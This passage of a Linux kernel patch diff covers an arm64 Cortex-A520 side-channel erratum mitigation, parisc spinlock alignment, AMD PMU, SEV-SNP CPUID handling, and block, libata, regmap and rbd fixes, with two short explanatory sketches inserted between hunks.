+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index d5eb2fbab473e..9ee9e17eb2ca0 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -983,6 +983,19 @@ config ARM64_ERRATUM_2457168
+ 
+ 	  If unsure, say Y.
+ 
++config ARM64_ERRATUM_2966298
++	bool "Cortex-A520: 2966298: workaround for speculatively executed unprivileged load"
++	default y
++	help
++	  This option adds the workaround for ARM Cortex-A520 erratum 2966298.
++
++	  On an affected Cortex-A520 core, a speculatively executed unprivileged
++	  load might leak data from a privileged level via a cache side channel.
++
++	  Work around this problem by executing a TLBI before returning to EL0.
++
++	  If unsure, say Y.
++
+ config CAVIUM_ERRATUM_22375
+ 	bool "Cavium erratum 22375, 24313"
+ 	default y
+diff --git a/arch/arm64/include/asm/cpufeature.h b/arch/arm64/include/asm/cpufeature.h
+index f73f11b550425..a0badda3a8d1c 100644
+--- a/arch/arm64/include/asm/cpufeature.h
++++ b/arch/arm64/include/asm/cpufeature.h
+@@ -670,7 +670,7 @@ static inline bool supports_clearbhb(int scope)
+ 		isar2 = read_sanitised_ftr_reg(SYS_ID_AA64ISAR2_EL1);
+ 
+ 	return cpuid_feature_extract_unsigned_field(isar2,
+-						    ID_AA64ISAR2_EL1_BC_SHIFT);
++						    ID_AA64ISAR2_EL1_CLRBHB_SHIFT);
+ }
+ 
+ const struct cpumask *system_32bit_el0_cpumask(void);
+@@ -863,7 +863,11 @@ static inline bool cpu_has_hw_af(void)
+ 	if (!IS_ENABLED(CONFIG_ARM64_HW_AFDBM))
+ 		return false;
+ 
+-	mmfr1 = read_cpuid(ID_AA64MMFR1_EL1);
++	/*
++	 * Use cached version to avoid emulated msr operation on KVM
++	 * guests.
++	 */
++	mmfr1 = read_sanitised_ftr_reg(SYS_ID_AA64MMFR1_EL1);
+ 	return cpuid_feature_extract_unsigned_field(mmfr1,
+ 						ID_AA64MMFR1_EL1_HAFDBS_SHIFT);
+ }
+diff --git a/arch/arm64/include/asm/cputype.h b/arch/arm64/include/asm/cputype.h
+index 65e53ef5a3960..357932938b5ab 100644
+--- a/arch/arm64/include/asm/cputype.h
++++ b/arch/arm64/include/asm/cputype.h
+@@ -79,6 +79,7 @@
+ #define ARM_CPU_PART_CORTEX_A78AE	0xD42
+ #define ARM_CPU_PART_CORTEX_X1		0xD44
+ #define ARM_CPU_PART_CORTEX_A510	0xD46
++#define ARM_CPU_PART_CORTEX_A520	0xD80
+ #define ARM_CPU_PART_CORTEX_A710	0xD47
+ #define ARM_CPU_PART_CORTEX_X2		0xD48
+ #define ARM_CPU_PART_NEOVERSE_N2	0xD49
+@@ -141,6 +142,7 @@
+ #define MIDR_CORTEX_A78AE	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A78AE)
+ #define MIDR_CORTEX_X1	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X1)
+ #define MIDR_CORTEX_A510 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A510)
++#define MIDR_CORTEX_A520 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A520)
+ #define MIDR_CORTEX_A710 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A710)
+ #define MIDR_CORTEX_X2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X2)
+ #define MIDR_NEOVERSE_N2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_N2)
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 8dbf3c21ea22a..3f917124684c5 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -723,6 +723,14 @@ const struct arm64_cpu_capabilities arm64_errata[] = {
+ 		.cpu_enable = cpu_clear_bf16_from_user_emulation,
+ 	},
+ #endif
++#ifdef CONFIG_ARM64_ERRATUM_2966298
++	{
++		.desc = "ARM erratum 2966298",
++		.capability = ARM64_WORKAROUND_2966298,
++		/* Cortex-A520 r0p0 - r0p1 */
++		ERRATA_MIDR_REV_RANGE(MIDR_CORTEX_A520, 0, 0, 1),
++	},
++#endif
+ #ifdef CONFIG_AMPERE_ERRATUM_AC03_CPU_38
+ 	{
+ 		.desc = "AmpereOne erratum AC03_CPU_38",
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index b3eb53847c96b..770a31c6ed81b 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -212,7 +212,8 @@ static const struct arm64_ftr_bits ftr_id_aa64isar1[] = {
+ };
+ 
+ static const struct arm64_ftr_bits ftr_id_aa64isar2[] = {
+-	ARM64_FTR_BITS(FTR_HIDDEN, FTR_STRICT, FTR_HIGHER_SAFE, ID_AA64ISAR2_EL1_BC_SHIFT, 4, 0),
++	ARM64_FTR_BITS(FTR_HIDDEN, FTR_STRICT, FTR_LOWER_SAFE, ID_AA64ISAR2_EL1_CLRBHB_SHIFT, 4, 0),
++	ARM64_FTR_BITS(FTR_HIDDEN, FTR_STRICT, FTR_LOWER_SAFE, ID_AA64ISAR2_EL1_BC_SHIFT, 4, 0),
+ 	ARM64_FTR_BITS(FTR_VISIBLE_IF_IS_ENABLED(CONFIG_ARM64_PTR_AUTH),
+ 		       FTR_STRICT, FTR_EXACT, ID_AA64ISAR2_EL1_APA3_SHIFT, 4, 0),
+ 	ARM64_FTR_BITS(FTR_VISIBLE_IF_IS_ENABLED(CONFIG_ARM64_PTR_AUTH),
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index beb4db21c89c1..de16fa917e1b8 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -419,6 +419,10 @@ alternative_else_nop_endif
+ 	ldp	x28, x29, [sp, #16 * 14]
+ 
+ 	.if	\el == 0
++alternative_if ARM64_WORKAROUND_2966298
++	tlbi	vale1, xzr
++	dsb	nsh
++alternative_else_nop_endif
+ alternative_if_not ARM64_UNMAP_KERNEL_AT_EL0
+ 	ldr	lr, [sp, #S_LR]
+ 	add	sp, sp, #PT_REGS_SIZE		// restore sp
+diff --git a/arch/arm64/tools/cpucaps b/arch/arm64/tools/cpucaps
+index 14d31d1b2ff02..e73830d9f1367 100644
+--- a/arch/arm64/tools/cpucaps
++++ b/arch/arm64/tools/cpucaps
+@@ -71,6 +71,7 @@ WORKAROUND_2064142
+ WORKAROUND_2077057
+ WORKAROUND_2457168
+ WORKAROUND_2658417
++WORKAROUND_2966298
+ WORKAROUND_AMPERE_AC03_CPU_38
+ WORKAROUND_TRBE_OVERWRITE_FILL_MODE
+ WORKAROUND_TSB_FLUSH_FAILURE
+diff --git a/arch/arm64/tools/sysreg b/arch/arm64/tools/sysreg
+index 384757a7eda9e..11c3f7a7cec7b 100644
+--- a/arch/arm64/tools/sysreg
++++ b/arch/arm64/tools/sysreg
+@@ -484,7 +484,11 @@ EndEnum
+ EndSysreg
+ 
+ Sysreg	ID_AA64ISAR2_EL1	3	0	0	6	2
+-Res0	63:28
++Res0	63:32
++Enum	31:28	CLRBHB
++	0b0000	NI
++	0b0001	IMP
++EndEnum
+ Enum	27:24	PAC_frac
+ 	0b0000	NI
+ 	0b0001	IMP
+diff --git a/arch/parisc/include/asm/ldcw.h b/arch/parisc/include/asm/ldcw.h
+index 6d28b5514699a..10a061d6899cd 100644
+--- a/arch/parisc/include/asm/ldcw.h
++++ b/arch/parisc/include/asm/ldcw.h
+@@ -2,14 +2,28 @@
+ #ifndef __PARISC_LDCW_H
+ #define __PARISC_LDCW_H
+ 
+-#ifndef CONFIG_PA20
+ /* Because kmalloc only guarantees 8-byte alignment for kmalloc'd data,
+    and GCC only guarantees 8-byte alignment for stack locals, we can't
+    be assured of 16-byte alignment for atomic lock data even if we
+    specify "__attribute ((aligned(16)))" in the type declaration.  So,
+    we use a struct containing an array of four ints for the atomic lock
+    type and dynamically select the 16-byte aligned int from the array
+-   for the semaphore.  */
++   for the semaphore. */
++
++/* From: "Jim Hull" <jim.hull of hp.com>
++   I've attached a summary of the change, but basically, for PA 2.0, as
++   long as the ",CO" (coherent operation) completer is implemented, then the
++   16-byte alignment requirement for ldcw and ldcd is relaxed, and instead
++   they only require "natural" alignment (4-byte for ldcw, 8-byte for
++   ldcd).
++
++   Although the cache control hint is accepted by all PA 2.0 processors,
++   it is only implemented on PA8800/PA8900 CPUs. Prior PA8X00 CPUs still
++   require 16-byte alignment. If the address is unaligned, the operation
++   of the instruction is undefined. The ldcw instruction does not generate
++   unaligned data reference traps so misaligned accesses are not detected.
++   This hid the problem for years. So, restore the 16-byte alignment dropped
++   by Kyle McMartin in "Remove __ldcw_align for PA-RISC 2.0 processors". */
+ 
+ #define __PA_LDCW_ALIGNMENT	16
+ #define __PA_LDCW_ALIGN_ORDER	4
+@@ -19,22 +33,12 @@
+ 		& ~(__PA_LDCW_ALIGNMENT - 1);			\
+ 	(volatile unsigned int *) __ret;			\
+ })
+-#define __LDCW	"ldcw"
+ 
+-#else /*CONFIG_PA20*/
+-/* From: "Jim Hull" <jim.hull of hp.com>
+-   I've attached a summary of the change, but basically, for PA 2.0, as
+-   long as the ",CO" (coherent operation) completer is specified, then the
+-   16-byte alignment requirement for ldcw and ldcd is relaxed, and instead
+-   they only require "natural" alignment (4-byte for ldcw, 8-byte for
+-   ldcd). */
+-
+-#define __PA_LDCW_ALIGNMENT	4
+-#define __PA_LDCW_ALIGN_ORDER	2
+-#define __ldcw_align(a) (&(a)->slock)
++#ifdef CONFIG_PA20
+ #define __LDCW	"ldcw,co"
+-
+-#endif /*!CONFIG_PA20*/
++#else
++#define __LDCW	"ldcw"
++#endif
+ 
+ /* LDCW, the only atomic read-write operation PA-RISC has. *sigh*.
+    We don't explicitly expose that "*a" may be written as reload
+diff --git a/arch/parisc/include/asm/spinlock_types.h b/arch/parisc/include/asm/spinlock_types.h
+index ca39ee350c3f4..35c5086b74d70 100644
+--- a/arch/parisc/include/asm/spinlock_types.h
++++ b/arch/parisc/include/asm/spinlock_types.h
+@@ -3,13 +3,8 @@
+ #define __ASM_SPINLOCK_TYPES_H
+ 
+ typedef struct {
+-#ifdef CONFIG_PA20
+-	volatile unsigned int slock;
+-# define __ARCH_SPIN_LOCK_UNLOCKED { 1 }
+-#else
+ 	volatile unsigned int lock[4];
+ # define __ARCH_SPIN_LOCK_UNLOCKED	{ { 1, 1, 1, 1 } }
+-#endif
+ } arch_spinlock_t;
+ 
+ 
+diff --git a/arch/parisc/kernel/smp.c b/arch/parisc/kernel/smp.c
+index 7dbd92cafae38..e37ec05487308 100644
+--- a/arch/parisc/kernel/smp.c
++++ b/arch/parisc/kernel/smp.c
+@@ -443,7 +443,9 @@ int __cpu_up(unsigned int cpu, struct task_struct *tidle)
+ 	if (cpu_online(cpu))
+ 		return 0;
+ 
+-	if (num_online_cpus() < setup_max_cpus && smp_boot_one_cpu(cpu, tidle))
++	if (num_online_cpus() < nr_cpu_ids &&
++		num_online_cpus() < setup_max_cpus &&
++		smp_boot_one_cpu(cpu, tidle))
+ 		return -EIO;
+ 
+ 	return cpu_online(cpu) ? 0 : -EIO;
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 6672a3f05fc68..04f4b96dec6df 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -534,8 +534,12 @@ static void amd_pmu_cpu_reset(int cpu)
+ 	/* Clear enable bits i.e. PerfCntrGlobalCtl.PerfCntrEn */
+ 	wrmsrl(MSR_AMD64_PERF_CNTR_GLOBAL_CTL, 0);
+ 
+-	/* Clear overflow bits i.e. PerfCntrGLobalStatus.PerfCntrOvfl */
+-	wrmsrl(MSR_AMD64_PERF_CNTR_GLOBAL_STATUS_CLR, amd_pmu_global_cntr_mask);
++	/*
++	 * Clear freeze and overflow bits i.e. PerfCntrGLobalStatus.LbrFreeze
++	 * and PerfCntrGLobalStatus.PerfCntrOvfl
++	 */
++	wrmsrl(MSR_AMD64_PERF_CNTR_GLOBAL_STATUS_CLR,
++	       GLOBAL_STATUS_LBRS_FROZEN | amd_pmu_global_cntr_mask);
+ }
+ 
+ static int amd_pmu_cpu_prepare(int cpu)
+@@ -570,6 +574,7 @@ static void amd_pmu_cpu_starting(int cpu)
+ 	int i, nb_id;
+ 
+ 	cpuc->perf_ctr_virt_mask = AMD64_EVENTSEL_HOSTONLY;
++	amd_pmu_cpu_reset(cpu);
+ 
+ 	if (!x86_pmu.amd_nb_constraints)
+ 		return;
+@@ -591,8 +596,6 @@ static void amd_pmu_cpu_starting(int cpu)
+ 
+ 	cpuc->amd_nb->nb_id = nb_id;
+ 	cpuc->amd_nb->refcnt++;
+-
+-	amd_pmu_cpu_reset(cpu);
+ }
+ 
+ static void amd_pmu_cpu_dead(int cpu)
+@@ -601,6 +604,7 @@ static void amd_pmu_cpu_dead(int cpu)
+ 
+ 	kfree(cpuhw->lbr_sel);
+ 	cpuhw->lbr_sel = NULL;
++	amd_pmu_cpu_reset(cpu);
+ 
+ 	if (!x86_pmu.amd_nb_constraints)
+ 		return;
+@@ -613,8 +617,6 @@ static void amd_pmu_cpu_dead(int cpu)
+ 
+ 		cpuhw->amd_nb = NULL;
+ 	}
+-
+-	amd_pmu_cpu_reset(cpu);
+ }
+ 
+ static inline void amd_pmu_set_global_ctl(u64 ctl)
+@@ -884,7 +886,7 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 	struct hw_perf_event *hwc;
+ 	struct perf_event *event;
+ 	int handled = 0, idx;
+-	u64 status, mask;
++	u64 reserved, status, mask;
+ 	bool pmu_enabled;
+ 
+ 	/*
+@@ -909,6 +911,14 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 		status &= ~GLOBAL_STATUS_LBRS_FROZEN;
+ 	}
+ 
++	reserved = status & ~amd_pmu_global_cntr_mask;
++	if (reserved)
++		pr_warn_once("Reserved PerfCntrGlobalStatus bits are set (0x%llx), please consider updating microcode\n",
++			     reserved);
++
++	/* Clear any reserved bits set by buggy microcode */
++	status &= amd_pmu_global_cntr_mask;
++
+ 	for (idx = 0; idx < x86_pmu.num_counters; idx++) {
+ 		if (!test_bit(idx, cpuc->active_mask))
+ 			continue;
+diff --git a/arch/x86/kernel/sev-shared.c b/arch/x86/kernel/sev-shared.c
+index 3a5b0c9c4fccc..7dce812ce2538 100644
+--- a/arch/x86/kernel/sev-shared.c
++++ b/arch/x86/kernel/sev-shared.c
+@@ -253,7 +253,7 @@ static int __sev_cpuid_hv(u32 fn, int reg_idx, u32 *reg)
+ 	return 0;
+ }
+ 
+-static int sev_cpuid_hv(struct cpuid_leaf *leaf)
++static int __sev_cpuid_hv_msr(struct cpuid_leaf *leaf)
+ {
+ 	int ret;
+ 
+@@ -276,6 +276,45 @@ static int sev_cpuid_hv(struct cpuid_leaf *leaf)
+ 	return ret;
+ }
+ 
++static int __sev_cpuid_hv_ghcb(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
++{
++	u32 cr4 = native_read_cr4();
++	int ret;
++
++	ghcb_set_rax(ghcb, leaf->fn);
++	ghcb_set_rcx(ghcb, leaf->subfn);
++
++	if (cr4 & X86_CR4_OSXSAVE)
++		/* Safe to read xcr0 */
++		ghcb_set_xcr0(ghcb, xgetbv(XCR_XFEATURE_ENABLED_MASK));
++	else
++		/* xgetbv will cause #UD - use reset value for xcr0 */
++		ghcb_set_xcr0(ghcb, 1);
++
++	ret = sev_es_ghcb_hv_call(ghcb, ctxt, SVM_EXIT_CPUID, 0, 0);
++	if (ret != ES_OK)
++		return ret;
++
++	if (!(ghcb_rax_is_valid(ghcb) &&
++	      ghcb_rbx_is_valid(ghcb) &&
++	      ghcb_rcx_is_valid(ghcb) &&
++	      ghcb_rdx_is_valid(ghcb)))
++		return ES_VMM_ERROR;
++
++	leaf->eax = ghcb->save.rax;
++	leaf->ebx = ghcb->save.rbx;
++	leaf->ecx = ghcb->save.rcx;
++	leaf->edx = ghcb->save.rdx;
++
++	return ES_OK;
++}
++
++static int sev_cpuid_hv(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
++{
++	return ghcb ? __sev_cpuid_hv_ghcb(ghcb, ctxt, leaf)
++		    : __sev_cpuid_hv_msr(leaf);
++}
++
+ /*
+  * This may be called early while still running on the initial identity
+  * mapping. Use RIP-relative addressing to obtain the correct address
+@@ -385,19 +424,20 @@ snp_cpuid_get_validated_func(struct cpuid_leaf *leaf)
+ 	return false;
+ }
+ 
+-static void snp_cpuid_hv(struct cpuid_leaf *leaf)
++static void snp_cpuid_hv(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
+ {
+-	if (sev_cpuid_hv(leaf))
++	if (sev_cpuid_hv(ghcb, ctxt, leaf))
+ 		sev_es_terminate(SEV_TERM_SET_LINUX, GHCB_TERM_CPUID_HV);
+ }
+ 
+-static int snp_cpuid_postprocess(struct cpuid_leaf *leaf)
++static int snp_cpuid_postprocess(struct ghcb *ghcb, struct es_em_ctxt *ctxt,
++				 struct cpuid_leaf *leaf)
+ {
+ 	struct cpuid_leaf leaf_hv = *leaf;
+ 
+ 	switch (leaf->fn) {
+ 	case 0x1:
+-		snp_cpuid_hv(&leaf_hv);
++		snp_cpuid_hv(ghcb, ctxt, &leaf_hv);
+ 
+ 		/* initial APIC ID */
+ 		leaf->ebx = (leaf_hv.ebx & GENMASK(31, 24)) | (leaf->ebx & GENMASK(23, 0));
+@@ -416,7 +456,7 @@ static int snp_cpuid_postprocess(struct cpuid_leaf *leaf)
+ 		break;
+ 	case 0xB:
+ 		leaf_hv.subfn = 0;
+-		snp_cpuid_hv(&leaf_hv);
++		snp_cpuid_hv(ghcb, ctxt, &leaf_hv);
+ 
+ 		/* extended APIC ID */
+ 		leaf->edx = leaf_hv.edx;
+@@ -464,7 +504,7 @@ static int snp_cpuid_postprocess(struct cpuid_leaf *leaf)
+ 		}
+ 		break;
+ 	case 0x8000001E:
+-		snp_cpuid_hv(&leaf_hv);
++		snp_cpuid_hv(ghcb, ctxt, &leaf_hv);
+ 
+ 		/* extended APIC ID */
+ 		leaf->eax = leaf_hv.eax;
+@@ -485,7 +525,7 @@ static int snp_cpuid_postprocess(struct cpuid_leaf *leaf)
+  * Returns -EOPNOTSUPP if feature not enabled. Any other non-zero return value
+  * should be treated as fatal by caller.
+  */
+-static int snp_cpuid(struct cpuid_leaf *leaf)
++static int snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
+ {
+ 	const struct snp_cpuid_table *cpuid_table = snp_cpuid_get_table();
+ 
+@@ -519,7 +559,7 @@ static int snp_cpuid(struct cpuid_leaf *leaf)
+ 			return 0;
+ 	}
+ 
+-	return snp_cpuid_postprocess(leaf);
++	return snp_cpuid_postprocess(ghcb, ctxt, leaf);
+ }
+ 
+ /*
+@@ -541,14 +581,14 @@ void __init do_vc_no_ghcb(struct pt_regs *regs, unsigned long exit_code)
+ 	leaf.fn = fn;
+ 	leaf.subfn = subfn;
+ 
+-	ret = snp_cpuid(&leaf);
++	ret = snp_cpuid(NULL, NULL, &leaf);
+ 	if (!ret)
+ 		goto cpuid_done;
+ 
+ 	if (ret != -EOPNOTSUPP)
+ 		goto fail;
+ 
+-	if (sev_cpuid_hv(&leaf))
++	if (__sev_cpuid_hv_msr(&leaf))
+ 		goto fail;
+ 
+ cpuid_done:
+@@ -845,14 +885,15 @@ static enum es_result vc_handle_ioio(struct ghcb *ghcb, struct es_em_ctxt *ctxt)
+ 	return ret;
+ }
+ 
+-static int vc_handle_cpuid_snp(struct pt_regs *regs)
++static int vc_handle_cpuid_snp(struct ghcb *ghcb, struct es_em_ctxt *ctxt)
+ {
++	struct pt_regs *regs = ctxt->regs;
+ 	struct cpuid_leaf leaf;
+ 	int ret;
+ 
+ 	leaf.fn = regs->ax;
+ 	leaf.subfn = regs->cx;
+-	ret = snp_cpuid(&leaf);
++	ret = snp_cpuid(ghcb, ctxt, &leaf);
+ 	if (!ret) {
+ 		regs->ax = leaf.eax;
+ 		regs->bx = leaf.ebx;
+@@ -871,7 +912,7 @@ static enum es_result vc_handle_cpuid(struct ghcb *ghcb,
+ 	enum es_result ret;
+ 	int snp_cpuid_ret;
+ 
+-	snp_cpuid_ret = vc_handle_cpuid_snp(regs);
++	snp_cpuid_ret = vc_handle_cpuid_snp(ghcb, ctxt);
+ 	if (!snp_cpuid_ret)
+ 		return ES_OK;
+ 	if (snp_cpuid_ret != -EOPNOTSUPP)
+diff --git a/block/blk-sysfs.c b/block/blk-sysfs.c
+index a582ea0da74f5..a82bdec923b21 100644
+--- a/block/blk-sysfs.c
++++ b/block/blk-sysfs.c
+@@ -737,6 +737,7 @@ static void blk_free_queue_rcu(struct rcu_head *rcu_head)
+ 	struct request_queue *q = container_of(rcu_head, struct request_queue,
+ 					       rcu_head);
+ 
++	percpu_ref_exit(&q->q_usage_counter);
+ 	kmem_cache_free(blk_get_queue_kmem_cache(blk_queue_has_srcu(q)), q);
+ }
+ 
+@@ -762,8 +763,6 @@ static void blk_release_queue(struct kobject *kobj)
+ 
+ 	might_sleep();
+ 
+-	percpu_ref_exit(&q->q_usage_counter);
+-
+ 	if (q->poll_stat)
+ 		blk_stat_remove_callback(q, q->poll_cb);
+ 	blk_stat_free_callback(q->poll_cb);
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 25b9bdf2fc380..6a053cd0cf410 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5022,11 +5022,27 @@ static const unsigned int ata_port_suspend_ehi = ATA_EHI_QUIET
+ 
+ static void ata_port_suspend(struct ata_port *ap, pm_message_t mesg)
+ {
++	/*
++	 * We are about to suspend the port, so we do not care about
++	 * scsi_rescan_device() calls scheduled by previous resume operations.
++	 * The next resume will schedule the rescan again. So cancel any rescan
++	 * that is not done yet.
++	 */
++	cancel_delayed_work_sync(&ap->scsi_rescan_task);
++
+ 	ata_port_request_pm(ap, mesg, 0, ata_port_suspend_ehi, false);
+ }
+ 
+ static void ata_port_suspend_async(struct ata_port *ap, pm_message_t mesg)
+ {
++	/*
++	 * We are about to suspend the port, so we do not care about
++	 * scsi_rescan_device() calls scheduled by previous resume operations.
++	 * The next resume will schedule the rescan again. So cancel any rescan
++	 * that is not done yet.
++	 */
++	cancel_delayed_work_sync(&ap->scsi_rescan_task);
++
+ 	ata_port_request_pm(ap, mesg, 0, ata_port_suspend_ehi, true);
+ }
+ 
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index d28628b964e29..7b9c9264b9a72 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1081,7 +1081,15 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 		}
+ 	} else {
+ 		sdev->sector_size = ata_id_logical_sector_size(dev->id);
+-		sdev->manage_start_stop = 1;
++		/*
++		 * Stop the drive on suspend but do not issue START STOP UNIT
++		 * on resume as this is not necessary and may fail: the device
++		 * will be woken up by ata_port_pm_resume() with a port reset
++		 * and device revalidation.
++		 */
++		sdev->manage_system_start_stop = true;
++		sdev->manage_runtime_start_stop = true;
++		sdev->no_start_on_resume = 1;
+ 	}
+ 
+ 	/*
+@@ -4640,7 +4648,7 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 	struct ata_link *link;
+ 	struct ata_device *dev;
+ 	unsigned long flags;
+-	bool delay_rescan = false;
++	int ret = 0;
+ 
+ 	mutex_lock(&ap->scsi_scan_mutex);
+ 	spin_lock_irqsave(ap->lock, flags);
+@@ -4649,37 +4657,34 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 		ata_for_each_dev(dev, link, ENABLED) {
+ 			struct scsi_device *sdev = dev->sdev;
+ 
++			/*
++			 * If the port was suspended before this was scheduled,
++			 * bail out.
++			 */
++			if (ap->pflags & ATA_PFLAG_SUSPENDED)
++				goto unlock;
++
+ 			if (!sdev)
+ 				continue;
+ 			if (scsi_device_get(sdev))
+ 				continue;
+ 
+-			/*
+-			 * If the rescan work was scheduled because of a resume
+-			 * event, the port is already fully resumed, but the
+-			 * SCSI device may not yet be fully resumed. In such
+-			 * case, executing scsi_rescan_device() may cause a
+-			 * deadlock with the PM code on device_lock(). Prevent
+-			 * this by giving up and retrying rescan after a short
+-			 * delay.
+-			 */
+-			delay_rescan = sdev->sdev_gendev.power.is_suspended;
+-			if (delay_rescan) {
+-				scsi_device_put(sdev);
+-				break;
+-			}
+-
+ 			spin_unlock_irqrestore(ap->lock, flags);
+-			scsi_rescan_device(&(sdev->sdev_gendev));
++			ret = scsi_rescan_device(sdev);
+ 			scsi_device_put(sdev);
+ 			spin_lock_irqsave(ap->lock, flags);
++
++			if (ret)
++				goto unlock;
+ 		}
+ 	}
+ 
++unlock:
+ 	spin_unlock_irqrestore(ap->lock, flags);
+ 	mutex_unlock(&ap->scsi_scan_mutex);
+ 
+-	if (delay_rescan)
++	/* Reschedule with a delay if scsi_rescan_device() returned an error */
++	if (ret)
+ 		schedule_delayed_work(&ap->scsi_rescan_task,
+ 				      msecs_to_jiffies(5));
+ }
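+/*
+ * Illustrative sketch, not part of the patch above: instead of the
+ * removed is_suspended special case, the handler now bails out on any
+ * scsi_rescan_device() error and reschedules itself. The generic
+ * retry-from-work shape, with a hypothetical sketch_try_rescan():
+ */
+#include <linux/workqueue.h>
+#include <linux/jiffies.h>
+
+static int sketch_try_rescan(void);
+
+static void sketch_rescan_fn(struct work_struct *work)
+{
+	struct delayed_work *dwork = to_delayed_work(work);
+
+	/* On failure, retry shortly rather than blocking in the work fn. */
+	if (sketch_try_rescan())
+		schedule_delayed_work(dwork, msecs_to_jiffies(5));
+}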
+diff --git a/drivers/base/regmap/regcache-rbtree.c b/drivers/base/regmap/regcache-rbtree.c
+index ae6b8788d5f3f..d65715b9e129e 100644
+--- a/drivers/base/regmap/regcache-rbtree.c
++++ b/drivers/base/regmap/regcache-rbtree.c
+@@ -453,7 +453,8 @@ static int regcache_rbtree_write(struct regmap *map, unsigned int reg,
+ 		if (!rbnode)
+ 			return -ENOMEM;
+ 		regcache_rbtree_set_register(map, rbnode,
+-					     reg - rbnode->base_reg, value);
++					     (reg - rbnode->base_reg) / map->reg_stride,
++					     value);
+ 		regcache_rbtree_insert(map, &rbtree_ctx->root, rbnode);
+ 		rbtree_ctx->cached_rbnode = rbnode;
+ 	}
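+/*
+ * Illustrative note, not part of the patch above: regcache blocks hold
+ * one value per register, while register addresses advance in units of
+ * map->reg_stride, so converting an address offset to a block index
+ * needs the division the hunk adds:
+ *
+ *	idx = (reg - base_reg) / map->reg_stride;
+ *
+ * e.g. with base_reg = 0x10 and reg_stride = 4, register 0x18 is entry
+ * (0x18 - 0x10) / 4 = 2, not entry 8.
+ */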
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index 74ef3da545361..afc92869cba42 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -632,9 +632,8 @@ void rbd_warn(struct rbd_device *rbd_dev, const char *fmt, ...)
+ static void rbd_dev_remove_parent(struct rbd_device *rbd_dev);
+ 
+ static int rbd_dev_refresh(struct rbd_device *rbd_dev);
+-static int rbd_dev_v2_header_onetime(struct rbd_device *rbd_dev);
+-static int rbd_dev_header_info(struct rbd_device *rbd_dev);
+-static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev);
++static int rbd_dev_v2_header_onetime(struct rbd_device *rbd_dev,
++				     struct rbd_image_header *header);
+ static const char *rbd_dev_v2_snap_name(struct rbd_device *rbd_dev,
+ 					u64 snap_id);
+ static int _rbd_dev_v2_snap_size(struct rbd_device *rbd_dev, u64 snap_id,
+@@ -995,15 +994,24 @@ static void rbd_init_layout(struct rbd_device *rbd_dev)
+ 	RCU_INIT_POINTER(rbd_dev->layout.pool_ns, NULL);
+ }
+ 
++static void rbd_image_header_cleanup(struct rbd_image_header *header)
++{
++	kfree(header->object_prefix);
++	ceph_put_snap_context(header->snapc);
++	kfree(header->snap_sizes);
++	kfree(header->snap_names);
++
++	memset(header, 0, sizeof(*header));
++}
++
+ /*
+  * Fill an rbd image header with information from the given format 1
+  * on-disk header.
+  */
+-static int rbd_header_from_disk(struct rbd_device *rbd_dev,
+-				 struct rbd_image_header_ondisk *ondisk)
++static int rbd_header_from_disk(struct rbd_image_header *header,
++				struct rbd_image_header_ondisk *ondisk,
++				bool first_time)
+ {
+-	struct rbd_image_header *header = &rbd_dev->header;
+-	bool first_time = header->object_prefix == NULL;
+ 	struct ceph_snap_context *snapc;
+ 	char *object_prefix = NULL;
+ 	char *snap_names = NULL;
+@@ -1070,11 +1078,6 @@ static int rbd_header_from_disk(struct rbd_device *rbd_dev,
+ 	if (first_time) {
+ 		header->object_prefix = object_prefix;
+ 		header->obj_order = ondisk->options.order;
+-		rbd_init_layout(rbd_dev);
+-	} else {
+-		ceph_put_snap_context(header->snapc);
+-		kfree(header->snap_names);
+-		kfree(header->snap_sizes);
+ 	}
+ 
+ 	/* The remaining fields always get updated (when we refresh) */
+@@ -4860,7 +4863,9 @@ out_req:
+  * return, the rbd_dev->header field will contain up-to-date
+  * information about the image.
+  */
+-static int rbd_dev_v1_header_info(struct rbd_device *rbd_dev)
++static int rbd_dev_v1_header_info(struct rbd_device *rbd_dev,
